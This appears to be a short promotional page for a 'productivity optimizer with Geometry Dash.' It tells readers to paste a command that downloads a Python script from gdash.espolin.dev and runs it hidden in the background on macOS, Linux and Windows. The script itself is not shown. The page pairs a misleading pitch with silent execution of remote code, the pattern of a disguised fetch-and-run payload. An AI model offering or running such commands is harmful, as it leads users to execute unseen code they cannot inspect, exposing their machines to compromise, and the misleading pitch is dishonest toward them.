Productivity optimizer with Geometry Dash!

Copy the command below and paste it into the terminal, your productivity shall surge like never before!

MacOS or Linux:
curl -fsSL "https://gdash.espolin.dev/files/main.py" -o main.py && nohup python3 main.py &
Windows:
curl -fsSL "https://gdash.espolin.dev/files/main.py" -o main.py && start /b pythonw main.py